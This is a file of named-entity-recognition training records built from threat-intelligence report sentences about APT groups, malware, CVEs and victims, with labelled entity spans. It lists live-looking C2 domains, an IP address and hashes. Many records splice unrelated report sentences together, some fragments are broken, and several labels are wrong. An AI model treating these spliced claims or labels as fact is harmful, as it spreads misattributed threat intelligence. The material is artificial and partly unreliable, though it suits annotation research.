{"text": "Please install the app immediately to avoid blocking your account . In one of the more recent campaigns on March 27 , 2019 , the threat actors targeted the Sweden-based consulting firm Cafax . The group has a history of using information exfiltrated from victims to blackmail victim companies into contracting the Poseidon Group as a security firm .", "spans": {"THREAT_ACTOR: threat actors": [[129, 142]], "ORGANIZATION: Cafax": [[185, 190]], "THREAT_ACTOR: Poseidon Group": [[314, 328]]}, "info": {"id": "cyberner_stix_train_007830", "source": "cyberner_stix_train"}}
{"text": "Usually , this message targets four or five people at a time . PwC UK has been engaged in supporting investigations linked to APT10 compromises . OceanLotus : kermacrescen.com 7244 . Not only can email accounts contain access to sensitive data , they can provide an even more convincing persona that is used to execute BEC campaigns impersonating other users to further collect credentials and potentially gain access to other systems .", "spans": {"ORGANIZATION: PwC UK": [[63, 69]], "THREAT_ACTOR: APT10": [[126, 131]], "THREAT_ACTOR: OceanLotus": [[146, 156]], "DOMAIN: kermacrescen.com": [[159, 175]]}, "info": {"id": "cyberner_stix_train_007831", "source": "cyberner_stix_train"}}
{"text": "Once exploit has been achieved , Nidiran is delivered through a self-extracting executable that extracts the components to a .tmp folder after it has been executed .", "spans": {"MALWARE: Nidiran": [[33, 40]], "FILEPATH: .tmp": [[125, 129]]}, "info": {"id": "cyberner_stix_train_007832", "source": "cyberner_stix_train"}}
{"text": "Lookout uncovered nine secondary payload applications : * These apps have not been previously reported and were discovered using data from the Lookout global sensor network , which collects app and device information from over 100 million sensors to provide researchers and customers with a holistic look at the mobile threat ecosystem today . In early 2018 , multiple media claimed that Turla operators used mail attachments to control infected machines . These 2 values , ServiceDll and ServiceDllUnloadOnStop are needed for services that run in a shared process . Postintrusion activities include lateral movement , as well as data collection and exfiltration via browserdata theft and a keylogger .", "spans": {"ORGANIZATION: Lookout": [[0, 7], [143, 150]], "ORGANIZATION: media": [[369, 374]], "TOOL: ServiceDll": [[474, 484]], "TOOL: ServiceDllUnloadOnStop": [[489, 511]]}, "info": {"id": "cyberner_stix_train_007833", "source": "cyberner_stix_train"}}
{"text": "] today svc [ . From the configuration it can be determined that the company was running F-Secure Antivirus and Mofang registered the domain to not appear suspicious . Backdoor.APT.Ixeshe : Microsoft reported the exploitation occurred together and is linked to a single group of actors tracked as “ HAFNIUM ” , a group that has previously targeted the US - based defense companies , law firms , infectious disease researchers , and think tanks .", "spans": {"TOOL: F-Secure Antivirus": [[89, 107]], "TOOL: Mofang": [[112, 118]], "FILEPATH: Backdoor.APT.Ixeshe": [[168, 187]], "ORGANIZATION: Microsoft": [[190, 199]], "THREAT_ACTOR: HAFNIUM": [[299, 306]], "ORGANIZATION: US - based defense companies": [[352, 380]], "ORGANIZATION: law firms": [[383, 392]], "ORGANIZATION: infectious disease researchers": [[395, 425]], "ORGANIZATION: think tanks": [[432, 443]]}, "info": {"id": "cyberner_stix_train_007834", "source": "cyberner_stix_train"}}
{"text": "THREAT ANALYSIS Initial Access Though EventBot is not currently on the Google Play Store , we were able to find several icons EventBot is using to masquerade as a legitimate application . Kaspersky Lab 's products detect the Microsoft Office exploits used in the spear-phishing attacks , including Exploit.MSWord.CVE-2010-333 , Exploit.Win32.CVE-2012-0158 . Lotus Blossom was attempting to exploit CVE-2014-6332 to install a new version of the Emissary Trojan , specifically version 5.3 .", "spans": {"MALWARE: EventBot": [[38, 46], [126, 134]], "SYSTEM: Google Play": [[71, 82]], "ORGANIZATION: Kaspersky Lab": [[188, 201]], "VULNERABILITY: Microsoft Office exploits": [[225, 250]], "MALWARE: Exploit.MSWord.CVE-2010-333": [[298, 325]], "MALWARE: Exploit.Win32.CVE-2012-0158": [[328, 355]], "THREAT_ACTOR: Lotus Blossom": [[358, 371]], "VULNERABILITY: exploit": [[390, 397]], "VULNERABILITY: CVE-2014-6332": [[398, 411]], "MALWARE: Emissary Trojan": [[444, 459]]}, "info": {"id": "cyberner_stix_train_007835", "source": "cyberner_stix_train"}}
{"text": "The name of the window is Spark4.2 .", "spans": {"MALWARE: Spark4.2": [[26, 34]]}, "info": {"id": "cyberner_stix_train_007836", "source": "cyberner_stix_train"}}
{"text": "This moniker is linked to a Russia based person active in Russian information security communities since at least 2011 .", "spans": {}, "info": {"id": "cyberner_stix_train_007837", "source": "cyberner_stix_train"}}
{"text": "Release_Time : 2018-02-28", "spans": {}, "info": {"id": "cyberner_stix_train_007838", "source": "cyberner_stix_train"}}
{"text": "Two recurring characteristics of the Sofacy group that we keep seeing in its attacks are speed and the use of multi-backdoor packages for extreme resilience .", "spans": {"THREAT_ACTOR: Sofacy": [[37, 43]]}, "info": {"id": "cyberner_stix_train_007839", "source": "cyberner_stix_train"}}
{"text": "samples called out to an additional command and control domain , stikerscloud.com .", "spans": {"DOMAIN: stikerscloud.com": [[65, 81]]}, "info": {"id": "cyberner_stix_train_007840", "source": "cyberner_stix_train"}}
{"text": "If any of these conditions is true , the application does not continue to execute the malicious flow . FireEye observed a high volume of activity associated with the exploitation of CVE-2017-10271 following the public posting of proof of concept code in December 2017 . The second group , known as DragonOK , targets high-tech and manufacturing companies in Japan and Taiwan .", "spans": {"ORGANIZATION: FireEye": [[103, 110]], "VULNERABILITY: CVE-2017-10271": [[182, 196]], "THREAT_ACTOR: DragonOK": [[298, 306]], "ORGANIZATION: high-tech": [[317, 326]], "ORGANIZATION: manufacturing companies": [[331, 354]]}, "info": {"id": "cyberner_stix_train_007841", "source": "cyberner_stix_train"}}
{"text": "The payload dropped to the system ( SHA256 : 6ad3eb8b5622145a70bec67b3d14868a1c13864864afd651fe70689c95b1399a ) is a UPX packed Zebrocy variant written in the Delphi language .", "spans": {"FILEPATH: 6ad3eb8b5622145a70bec67b3d14868a1c13864864afd651fe70689c95b1399a": [[45, 109]], "TOOL: UPX": [[117, 120]], "MALWARE: Zebrocy": [[128, 135]], "TOOL: Delphi": [[159, 165]]}, "info": {"id": "cyberner_stix_train_007842", "source": "cyberner_stix_train"}}
{"text": "After the infection stage , criminals move laterally with the help of legitimate and pentesting tools , stealing passwords from their initial victims ( entry point ) to gain access to the computers within the organization that have access to money transactions . Based on this information , CTU researchers assess that TG-3390 aims to collect defense technology and capability intelligence , other industrial intelligence , and political intelligence from governments and NGOs .", "spans": {"ORGANIZATION: CTU": [[291, 294]], "THREAT_ACTOR: TG-3390": [[319, 326]], "ORGANIZATION: political intelligence": [[428, 450]], "ORGANIZATION: governments": [[456, 467]]}, "info": {"id": "cyberner_stix_train_007843", "source": "cyberner_stix_train"}}
{"text": "We believe that these industries have also been targeted as part of a larger supply-chain attack in order for Orangeworm to get access to their intended victims related to healthcare . From September 2016 through late November 2016 , a threat actor group used both the Trochilus RAT and a newly idenfied RAT we've named MoonWind to target organizations in Thailand , including a utility organization .", "spans": {"ORGANIZATION: healthcare": [[172, 182]], "MALWARE: Trochilus RAT": [[269, 282]], "MALWARE: RAT": [[304, 307]], "MALWARE: MoonWind": [[320, 328]], "ORGANIZATION: utility organization": [[379, 399]]}, "info": {"id": "cyberner_stix_train_007844", "source": "cyberner_stix_train"}}
{"text": "2015–2016 Starting from mid-2015 , the Trojan began using the AES algorithm to encrypt data communicated between the infected device and the C & C : Also starting with the same version , data is sent in a POST request to the relative address with the format “ / [ number ] ” ( a pseudo-randomly generated number in the range 0–9999 ) . WannaCry appends encrypted data files with the .WCRY extension , drops and executes a decryptor tool , and demands $300 or $600 USD ( via Bitcoin ) to decrypt the data . The backdoors Lazarus are deploying are difficult to detect and a significant threat to the privacy and security of enterprises , allowing attackers to steal information , delete files , install malware , and more .", "spans": {"TOOL: WannaCry": [[336, 344]], "MALWARE: .WCRY": [[383, 388]], "THREAT_ACTOR: Lazarus": [[520, 527]], "ORGANIZATION: enterprises": [[622, 633]], "THREAT_ACTOR: attackers": [[645, 654]]}, "info": {"id": "cyberner_stix_train_007845", "source": "cyberner_stix_train"}}
{"text": "The source process looks at its own memory to calculate the offset between the beginning of the libc library and the mmap address . The attacks were initially discovered while investigating a phishing attack that targeted political figures in the MENA region . BLACKCOFFEE supports an initial set of fifteen commands , including creating a reverse shell , uploading and downloading files , and enumerating files and processes . The attackers left a small clue in the code , in the form of the number 666 ( 0x29A hex ) before one of the decryption subroutines : • By analysing the logs from the command servers , we have observed 59 unique victims in 23 countries : For the detailed analysis and information on how to protect against the attack , please read :", "spans": {"ORGANIZATION: political": [[222, 231]], "MALWARE: BLACKCOFFEE": [[261, 272]], "THREAT_ACTOR: attackers": [[432, 441]], "SYSTEM: the command servers": [[590, 609]]}, "info": {"id": "cyberner_stix_train_007846", "source": "cyberner_stix_train"}}
{"text": "A review of the bit.ly statistics for these campaigns shows that they were at least as effective in driving end-user clicks as the Bank Austria campaign analyzed above . A number of the CIA's electronic attack methods are designed for physical proximity . Deep Panda also appears to be known as Black Vine based on the attribution of both group names to the Anthem intrusion .", "spans": {"SYSTEM: Bank Austria": [[131, 143]], "THREAT_ACTOR: CIA's": [[186, 191]], "THREAT_ACTOR: Deep Panda": [[256, 266]], "THREAT_ACTOR: Black Vine": [[295, 305]], "ORGANIZATION: Anthem": [[358, 364]]}, "info": {"id": "cyberner_stix_train_007847", "source": "cyberner_stix_train"}}
{"text": "Targets held the following titles :", "spans": {}, "info": {"id": "cyberner_stix_train_007848", "source": "cyberner_stix_train"}}
{"text": "After execution it takes care of restoring the original KernelCallbackTable . We present the connection between Behzad Mesri , an Iranian national recently indicted for his involvement in hacking HBO , and Charming Kitten . The shellcode then proceeds to execute the payload DLL’s entry point . It also reveals direct links to secure[.]66[.]to and zhu[.]vn , both of which also belong to Hack520 and contains his personal blog .", "spans": {"THREAT_ACTOR: Behzad Mesri": [[112, 124]], "THREAT_ACTOR: Charming Kitten": [[206, 221]], "THREAT_ACTOR: Hack520": [[388, 395]]}, "info": {"id": "cyberner_stix_train_007849", "source": "cyberner_stix_train"}}
{"text": "The increasing sophistication of surveillance techniques has drawn comparisons with George Orwell's 1984 , but Weeping Angel , developed by the CIA's Embedded Devices Branch (EDB) , which infests smart TVs , transforming them into covert microphones , is surely its most emblematic realization . Some of the exploit server paths contain modules that appear to have been designed to infect Linux computers , but we have not yet located the Linux backdoor .", "spans": {"TOOL: Weeping Angel": [[111, 124]], "THREAT_ACTOR: CIA's": [[144, 149]], "TOOL: smart TVs": [[196, 205]], "VULNERABILITY: exploit": [[308, 315]], "SYSTEM: Linux": [[389, 394], [439, 444]]}, "info": {"id": "cyberner_stix_train_007850", "source": "cyberner_stix_train"}}
{"text": "Lotus Blossom attempted to exploit CVE-2014-6332 using the POC code available in the wild . As detailed in the previous section , this malware is able to manipulate and exfiltrate emails .", "spans": {"THREAT_ACTOR: Lotus Blossom": [[0, 13]], "VULNERABILITY: CVE-2014-6332": [[35, 48]], "TOOL: emails": [[180, 186]]}, "info": {"id": "cyberner_stix_train_007851", "source": "cyberner_stix_train"}}
{"text": "ONIONDUKE : First known activity February 2013 , Most recent known activity Spring 2015 , C&C communication methods HTTP(S) , Twitter ( backup ) , Known toolset components Dropper , Loader , Multiple modular core components , Information stealer , Distributed Denial of Service ( DDoS ) module , Password stealing module , Information gathering module , Social network spamming module .", "spans": {"MALWARE: ONIONDUKE": [[0, 9]], "TOOL: C&C": [[90, 93]], "TOOL: Twitter": [[126, 133]], "TOOL: Dropper": [[172, 179]], "TOOL: Loader": [[182, 188]], "TOOL: Multiple modular": [[191, 207]], "TOOL: Information stealer": [[226, 245]], "TOOL: Distributed Denial of Service": [[248, 277]], "TOOL: DDoS": [[280, 284]]}, "info": {"id": "cyberner_stix_train_007852", "source": "cyberner_stix_train"}}
{"text": "Analysis of the malicious iOS profile also revealed further connections , as the profile can also be downloaded from a website that FakeSpy deployed early this year . However , three themes in APT28 's targeting clearly reflects areas of specific interest to an Eastern European government , most likely the Russian government . In this case, the content net user is written to . The core module has a lot of functionality that gives the attacker full control of the victim machine .", "spans": {"SYSTEM: iOS": [[26, 29]], "MALWARE: FakeSpy": [[132, 139]], "THREAT_ACTOR: APT28": [[193, 198]], "ORGANIZATION: government": [[279, 289]], "THREAT_ACTOR: attacker": [[438, 446]]}, "info": {"id": "cyberner_stix_train_007853", "source": "cyberner_stix_train"}}
{"text": "After an app is installed , the ad service pays the attacker . REDBALDKNIGHT , also known as BRONZE BUTLER and Tick , is a cyberespionage group known to target Japanese organizations such as government agencies ( including defense ) as well as those in biotechnology , electronics manufacturing , and industrial chemistry . . An additional field of interest in the XPdb was the exec_cdhash , which contains the cdhash , or Code Directory hash , of the executed binaries .", "spans": {"THREAT_ACTOR: REDBALDKNIGHT": [[63, 76]], "THREAT_ACTOR: BRONZE BUTLER": [[93, 106]], "THREAT_ACTOR: Tick": [[111, 115]], "THREAT_ACTOR: cyberespionage group": [[123, 143]], "ORGANIZATION: government agencies": [[191, 210]], "ORGANIZATION: defense": [[223, 230]], "ORGANIZATION: biotechnology": [[253, 266]], "ORGANIZATION: electronics manufacturing": [[269, 294]], "ORGANIZATION: industrial chemistry": [[301, 321]]}, "info": {"id": "cyberner_stix_train_007854", "source": "cyberner_stix_train"}}
{"text": "The DeltaCharlie DDoS bot was originally reported by Novetta in their 2016 Operation Blockbuster Malware Report .", "spans": {"MALWARE: DeltaCharlie": [[4, 16]], "TOOL: bot": [[22, 25]], "ORGANIZATION: Novetta": [[53, 60]]}, "info": {"id": "cyberner_stix_train_007855", "source": "cyberner_stix_train"}}
{"text": "Technical Analysis The repackaged applications are embedded with malicious code , which can be found in the com.golf package . Operation Erebus leverages another Flash Player exploit ( CVE-2016-4117 ) through the use of watering hole attacks . We have seen two types of documents sent to victims in these spear phishing campaigns . The attackers may also want to use source code stolen from the game companies so it can be deployed in rogue servers offering pirated versions of the games .", "spans": {"VULNERABILITY: Flash Player exploit": [[162, 182]], "VULNERABILITY: CVE-2016-4117": [[185, 198]], "THREAT_ACTOR: attackers": [[336, 345]]}, "info": {"id": "cyberner_stix_train_007856", "source": "cyberner_stix_train"}}
{"text": "Between October 2015 and May 2016 , CTU researchers analyzed 8,909 Bitly links that targeted 3,907 individual Gmail accounts and corporate and organizational email accounts that use Gmail as a service .", "spans": {"ORGANIZATION: CTU": [[36, 39]], "TOOL: Bitly": [[67, 72]], "TOOL: Gmail": [[110, 115], [182, 187]], "TOOL: email": [[158, 163]]}, "info": {"id": "cyberner_stix_train_007857", "source": "cyberner_stix_train"}}
{"text": "FireEye HX Exploit Guard is a behavior-based solution that is not affected by the tricks used here .", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "TOOL: HX Exploit Guard": [[8, 24]], "TOOL: behavior-based solution": [[30, 53]]}, "info": {"id": "cyberner_stix_train_007858", "source": "cyberner_stix_train"}}
{"text": "If the attackers are attempting to compromise persons involved in SEC filings due to their information access , they may ultimately be pursuing securities fraud or other investment abuse . The targets were similar to a 2015 TG-4127 campaign — individuals in Russia and the former Soviet states , current and former military and government personnel in the U.S. and Europe , individuals working in the defense and government supply chain , and authors and journalists — but also included email accounts linked to the November 2016 United States presidential election .", "spans": {"THREAT_ACTOR: attackers": [[7, 16]], "ORGANIZATION: military": [[315, 323]], "ORGANIZATION: government personnel": [[328, 348]], "ORGANIZATION: defense": [[401, 408]], "ORGANIZATION: government": [[413, 423]], "ORGANIZATION: authors": [[443, 450]], "ORGANIZATION: journalists": [[455, 466]]}, "info": {"id": "cyberner_stix_train_007859", "source": "cyberner_stix_train"}}
{"text": "In addition to the new AZZY backdoors with side-DLL for C&C , we observed a new set of data-theft modules deployed against victims by the Sofacy group .", "spans": {"MALWARE: AZZY backdoors": [[23, 37]], "TOOL: side-DLL": [[43, 51]], "TOOL: C&C": [[56, 59]], "THREAT_ACTOR: Sofacy": [[138, 144]]}, "info": {"id": "cyberner_stix_train_007860", "source": "cyberner_stix_train"}}
{"text": "If the phone is attached to a bank card , commands are sent from the C & C server with instructions to transfer money from the user ’ s bank account to his/her mobile account . Turla all uses an encrypted container to store the malware 's components and configuration and they also log their actions in a file . Middle Eastern hacking group is using FinFisher malware to conduct international espionage . Looking at the motivations of hackers and cybercriminals is just one possible way to look at how we can dictate our cybersecurity priorities .", "spans": {"THREAT_ACTOR: Turla": [[177, 182]], "TOOL: encrypted container": [[195, 214]], "MALWARE: FinFisher": [[350, 359]], "THREAT_ACTOR: hackers": [[435, 442]], "THREAT_ACTOR: cybercriminals": [[447, 461]]}, "info": {"id": "cyberner_stix_train_007861", "source": "cyberner_stix_train"}}
{"text": "Then , the APK is installed as system application and registers listener on USER_PRESENT event . According to FireEye , the attackers sent out emails containing malicious documents designed to exploit Microsoft Office vulnerabilities in an effort to deliver a piece of malware dubbed LOWBALL . Most targets are from the Middle East : Israel , Egypt , Saudi Arabia , United Arab Emirates and Iraq .", "spans": {"ORGANIZATION: FireEye": [[110, 117]], "THREAT_ACTOR: attackers": [[124, 133]], "VULNERABILITY: Microsoft Office vulnerabilities": [[201, 233]], "TOOL: LOWBALL": [[284, 291]]}, "info": {"id": "cyberner_stix_train_007862", "source": "cyberner_stix_train"}}
{"text": "SectorJ04 used the spear phishing email to spread malicious Excel or malicious Word files , and downloaded the MSI files from the attacker’s server when the malicious documents were run . The first time the Lambert family malware was uncovered publicly was in October 2014 , when FireEye posted a blog about a zero day exploit ( CVE-2014-4148 ) used in the wild .", "spans": {"THREAT_ACTOR: SectorJ04": [[0, 9]], "THREAT_ACTOR: attacker’s": [[130, 140]], "MALWARE: Lambert family malware": [[207, 229]], "ORGANIZATION: FireEye": [[280, 287]], "VULNERABILITY: zero day": [[310, 318]], "VULNERABILITY: exploit": [[319, 326]], "VULNERABILITY: CVE-2014-4148": [[329, 342]]}, "info": {"id": "cyberner_stix_train_007863", "source": "cyberner_stix_train"}}
{"text": "After conveniently granting itself additional privileges and securing its persistence on the device , Cerberus registers the infected device in the botnet and waits for commands from the C2 server while also being ready to perform overlay attacks . They mainly utilize spam email to deliver their backdoor to the infected system that can perform additional commands from the attacker’s server . A well-funded , highly active BlackOasis group of Middle Eastern hackers was caught , yet again , using a lucrative zero-day exploit in the wild to break into computers and infect them with powerful spyware developed by an infamous cyberweapons dealer named Gamma Group .", "spans": {"MALWARE: Cerberus": [[102, 110]], "THREAT_ACTOR: attacker’s": [[375, 385]], "THREAT_ACTOR: BlackOasis group": [[425, 441]], "VULNERABILITY: zero-day": [[511, 519]], "VULNERABILITY: exploit": [[520, 527]], "THREAT_ACTOR: Gamma Group": [[653, 664]]}, "info": {"id": "cyberner_stix_train_007864", "source": "cyberner_stix_train"}}
{"text": "As part of our investigations , we were also able to identify and contact one of the attackers to try and gain insights into the motivations behind these attacks .", "spans": {}, "info": {"id": "cyberner_stix_train_007865", "source": "cyberner_stix_train"}}
{"text": "The infection begins when a user downloads and installs a Gooligan-infected app on a vulnerable Android device . One group , which we call Cadelle , uses Backdoor.Cadelspy , while the other , which we've named Chafer , uses Backdoor.Remexi and Backdoor.Remexi.B . So the pattern matching function replaces the global variable with 0 . 3AM is socalled because it appends encrypted files with the extension .threeamtime .", "spans": {"MALWARE: Gooligan-infected": [[58, 75]], "THREAT_ACTOR: group": [[117, 122]], "THREAT_ACTOR: Cadelle": [[139, 146]], "TOOL: Backdoor.Cadelspy": [[154, 171]], "THREAT_ACTOR: Chafer": [[210, 216]], "TOOL: Backdoor.Remexi": [[224, 239]], "TOOL: Backdoor.Remexi.B": [[244, 261]], "MALWARE: 3AM": [[335, 338]]}, "info": {"id": "cyberner_stix_train_007866", "source": "cyberner_stix_train"}}
{"text": "In June 2016 , shortly after the DNC ’s announcement , the Guccifer 2.0 persona claimed responsibility for the DNC breach and leaked documents taken from the organization ’s network .", "spans": {"ORGANIZATION: DNC": [[33, 36], [111, 114]], "THREAT_ACTOR: Guccifer": [[59, 67]]}, "info": {"id": "cyberner_stix_train_007867", "source": "cyberner_stix_train"}}
{"text": "This led us to believe the two groups were connected , at least to begin with , although it appears they parted ways in 2014 , with the original Miniduke group switching to the CosmicDuke implant .", "spans": {"THREAT_ACTOR: Miniduke": [[145, 153]], "MALWARE: CosmicDuke": [[177, 187]]}, "info": {"id": "cyberner_stix_train_007868", "source": "cyberner_stix_train"}}
{"text": "It is now clear that a distinct industry has developed and is becoming more focused on extracting profits , which is clearly evident from the functionality of the malware . We suspect this router was hacked as part of the campaign in order to process the malware 's HTTP requests . We have chosen to keep the name “ Winnti Group ” since it ’s the name first used to identify it , in 2013 , by Kaspersky . As we commonly see in the ransomware space , this threat is delivered through a variety of mechanisms which can include phishing and being dropped as secondary payloads from command and control ( C2 ) frameworks like Cobalt Strike .", "spans": {"TOOL: router": [[189, 195]], "THREAT_ACTOR: Winnti Group": [[316, 328]], "ORGANIZATION: Kaspersky": [[393, 402]], "SYSTEM: control ( C2 ) frameworks": [[591, 616]], "SYSTEM: Cobalt Strike": [[622, 635]]}, "info": {"id": "cyberner_stix_train_007869", "source": "cyberner_stix_train"}}
{"text": "The filenames across the two variants bear striking similarities .", "spans": {}, "info": {"id": "cyberner_stix_train_007870", "source": "cyberner_stix_train"}}
{"text": "Use and configure available firewalls to block attacks .", "spans": {"TOOL: firewalls": [[28, 37]]}, "info": {"id": "cyberner_stix_train_007871", "source": "cyberner_stix_train"}}
{"text": "Exfiltrated contact list data sent to the C2 server . The list also includes several hack tools , such as Mimikatz for credential dumping and several compiled python scripts used to locate and compromise other systems on the local network . As the crisis in Syria escalates , FireEye researchers have discovered a threat group , which we call \" Ke3chang \" , that falsely advertises information updates about the ongoing crisis to compromise MFA networks in Europe .", "spans": {"TOOL: hack tools": [[85, 95]], "TOOL: Mimikatz": [[106, 114]], "TOOL: python scripts": [[159, 173]], "ORGANIZATION: FireEye": [[276, 283]], "THREAT_ACTOR: Ke3chang": [[345, 353]]}, "info": {"id": "cyberner_stix_train_007872", "source": "cyberner_stix_train"}}
{"text": "Mobile Malware Evolution : 2013 24 FEB 2014 The mobile malware sector is growing rapidly both technologically and structurally . The operators used the HyperBro Trojan as their last-stage in-memory remote administration tool ( RAT ) . The Winnti Group , active since at least 2012 , is responsible for for high-profile supply-chain attacks against the video game and software industries leading to the distribution of trojanized software ( such as CCleaner , ASUS LiveUpdate and multiple video games ) that is then used to compromise more victims . Method , where the code checks one of two values before running encryption logic", "spans": {"TOOL: HyperBro Trojan": [[152, 167]], "TOOL: RAT": [[227, 230]], "THREAT_ACTOR: Winnti Group": [[239, 251]], "MALWARE: trojanized software": [[418, 437]], "TOOL: CCleaner": [[448, 456]], "TOOL: ASUS LiveUpdate": [[459, 474]]}, "info": {"id": "cyberner_stix_train_007873", "source": "cyberner_stix_train"}}
{"text": "As news of the DNC breach spread , APT28 was preparing for another set of operations : countering the condemnation that Russia was facing after doping allegations and a threatened blanket ban of the Russian team from the upcoming Rio Games .", "spans": {"ORGANIZATION: DNC": [[15, 18]], "THREAT_ACTOR: APT28": [[35, 40]], "ORGANIZATION: Rio Games": [[230, 239]]}, "info": {"id": "cyberner_stix_train_007874", "source": "cyberner_stix_train"}}
{"text": "Screenshot capture ( with the GDI API ) ;", "spans": {"TOOL: GDI": [[30, 33]], "TOOL: API": [[34, 37]]}, "info": {"id": "cyberner_stix_train_007875", "source": "cyberner_stix_train"}}
{"text": "The module allows Gooligan to : Steal a user ’ s Google email account and authentication token information Install apps from Google Play and rate them to raise their reputation Install adware to generate revenue Ad servers , which don ’ t know whether an app using its service is malicious or not , send Gooligan the names of the apps to download from Google Play . BlackOasis ' interests span a wide gamut of figures involved in Middle Eastern politics . We need to check if the value comes from the result of x * ( x – 1 ) Tools used by the attackers in this campaign included", "spans": {"MALWARE: Gooligan": [[18, 26], [304, 312]], "ORGANIZATION: Google": [[49, 55]], "SYSTEM: Google Play": [[125, 136], [352, 363]], "THREAT_ACTOR: BlackOasis": [[366, 376]], "ORGANIZATION: politics": [[445, 453]], "TOOL: Tools": [[525, 530]], "THREAT_ACTOR: attackers": [[543, 552]]}, "info": {"id": "cyberner_stix_train_007876", "source": "cyberner_stix_train"}}
{"text": "This tool also has a heavy reliance on EventHandlers with timers to run its methods in a specific order and potentially increase its evasion capability .", "spans": {}, "info": {"id": "cyberner_stix_train_007877", "source": "cyberner_stix_train"}}
{"text": "This method is not unique to HammerDuke , as MiniDuke , OnionDuke , and CozyDuke all support similar use of Twitter ( image 9 , page 18 ) to retrieve links to additional payloads or commands . 2015 : CloudDuke .", "spans": {"MALWARE: HammerDuke": [[29, 39]], "MALWARE: MiniDuke": [[45, 53]], "MALWARE: OnionDuke": [[56, 65]], "MALWARE: CozyDuke": [[72, 80]], "TOOL: Twitter": [[108, 115]], "MALWARE: CloudDuke": [[200, 209]]}, "info": {"id": "cyberner_stix_train_007878", "source": "cyberner_stix_train"}}
{"text": "Given the evidence outlined above , CrowdStrike attributes the PUTTER PANDA group to PLA Unit 61486 within Shanghai , China with high confidence . We didn’t choose to name it after a vegetable; the .NET malware developers named it Topinambour themselves .", "spans": {"ORGANIZATION: CrowdStrike": [[36, 47]], "THREAT_ACTOR: PUTTER PANDA group": [[63, 81]], "THREAT_ACTOR: Unit 61486": [[89, 99]], "FILEPATH: .NET malware": [[198, 210]], "FILEPATH: Topinambour": [[231, 242]]}, "info": {"id": "cyberner_stix_train_007879", "source": "cyberner_stix_train"}}
{"text": "The most common credential stealing tool used by the threat actor was a modified mimikatz that dumps NTLM hashes . Some of the exploit server paths contain modules that appear to have been designed to infect Linux computers , but we have not yet located the Linux backdoor .", "spans": {"THREAT_ACTOR: threat actor": [[53, 65]], "TOOL: mimikatz": [[81, 89]], "VULNERABILITY: exploit": [[127, 134]], "SYSTEM: Linux": [[208, 213], [258, 263]]}, "info": {"id": "cyberner_stix_train_007880", "source": "cyberner_stix_train"}}
{"text": "In 2011 , three years after the most recent release of PIVY , attackers used the RAT to compromise security firm RSA and steal data about its SecureID authentication system . Based on the command capabilities of the Taidoor malware , we were able to determine that data theft and data destruction was possible .", "spans": {"TOOL: PIVY": [[55, 59]], "THREAT_ACTOR: attackers": [[62, 71]], "TOOL: RAT": [[81, 84]], "ORGANIZATION: security firm RSA": [[99, 116]], "MALWARE: Taidoor": [[216, 223]], "MALWARE: malware": [[224, 231]]}, "info": {"id": "cyberner_stix_train_007881", "source": "cyberner_stix_train"}}
{"text": "This document appeared to be targeting a government organization dealing with foreign affairs in Europe via spear-phishing .", "spans": {}, "info": {"id": "cyberner_stix_train_007882", "source": "cyberner_stix_train"}}
{"text": "The payload delivered in these November 2017 attacks using DDE enabled documents was SofacyCarberp , which differs from the Zebrocy downloader delivered in the February 2018 attacks . 115fd8c619fa173622c7a1e84efdf6fed08a25d3ca3095404dcbd5ac3deb1f03 was another Zebrocy sample we were able to pivot from by gathering additional samples connecting to its C2 86.106.131.177 .", "spans": {"MALWARE: SofacyCarberp": [[85, 98]], "MALWARE: Zebrocy": [[124, 131], [261, 268]], "FILEPATH: 115fd8c619fa173622c7a1e84efdf6fed08a25d3ca3095404dcbd5ac3deb1f03": [[184, 248]], "TOOL: C2": [[353, 355]], "IP_ADDRESS: 86.106.131.177": [[356, 370]]}, "info": {"id": "cyberner_stix_train_007883", "source": "cyberner_stix_train"}}
{"text": "The document , when opened , used an embedded ActiveX control to download a JavaScript file from a remote site that used a previously unknown vulnerability in some versions of Windows ( later designated CVE-2013-7331 ) to read information about the browser 's installed components . This program is designed to capture keystrokes , take screenshots of the user 's desktop and get contents from the clipboard .", "spans": {"TOOL: ActiveX control": [[46, 61]], "MALWARE: JavaScript file": [[76, 91]], "VULNERABILITY: CVE-2013-7331": [[203, 216]]}, "info": {"id": "cyberner_stix_train_007884", "source": "cyberner_stix_train"}}
{"text": "31a8633c2cd67ae965524d0b2192e9f14d04d016 FinFisher exposed : A researcher ’ s tale of defeating traps , tricks , and complex virtual machines March 1 , 2018 Office 365 Advanced Threat Protection ( Office 365 ATP ) blocked many notable zero-day exploits in 2017 . The actor 's targeting is consistent with Chinese state interests and there are multiple technical artifacts indicating the actor is based in China . At the time of writing , none of the domains resolve and the C&C servers are not responding . Instead , it appeared that corresponding requests were made directly through the Outlook Web Application ( OWA ) endpoint , indicating a previously undisclosed exploit method for Exchange .", "spans": {"MALWARE: FinFisher": [[41, 50]], "SYSTEM: Office 365 Advanced Threat Protection": [[157, 194]], "SYSTEM: Office 365 ATP": [[197, 211]], "THREAT_ACTOR: actor": [[267, 272], [387, 392]]}, "info": {"id": "cyberner_stix_train_007885", "source": "cyberner_stix_train"}}
{"text": "Transparent Tribe has been active for several years and conducting suspected intelligence collection operations against South Asian political and military targets . The Word document usually exploits CVE-2012-0158 .", "spans": {"ORGANIZATION: political and military targets": [[132, 162]], "TOOL: Word": [[169, 173]], "VULNERABILITY: CVE-2012-0158": [[200, 213]]}, "info": {"id": "cyberner_stix_train_007886", "source": "cyberner_stix_train"}}
{"text": "“ Cyber Conflict ” Decoy Document Used In Real Cyber Conflict .", "spans": {}, "info": {"id": "cyberner_stix_train_007887", "source": "cyberner_stix_train"}}
{"text": "This new mobile ransomware variant is an important discovery because the malware exhibits behaviors that have not been seen before and could open doors for other malware to follow . Over the years , the Ke3chang attackers have used three types of malware that we call : \" BS2005 \" , \" BMW \" , and \" MyWeb \" . This implementation will deobfuscate approximately 89% of encountered functions . The next is to call with expecting it to return 0 as it is likely to have an environment variable name like that .", "spans": {"THREAT_ACTOR: Ke3chang": [[203, 211]], "THREAT_ACTOR: attackers": [[212, 221]], "TOOL: BS2005": [[272, 278]], "TOOL: BMW": [[285, 288]], "TOOL: MyWeb": [[299, 304]]}, "info": {"id": "cyberner_stix_train_007888", "source": "cyberner_stix_train"}}
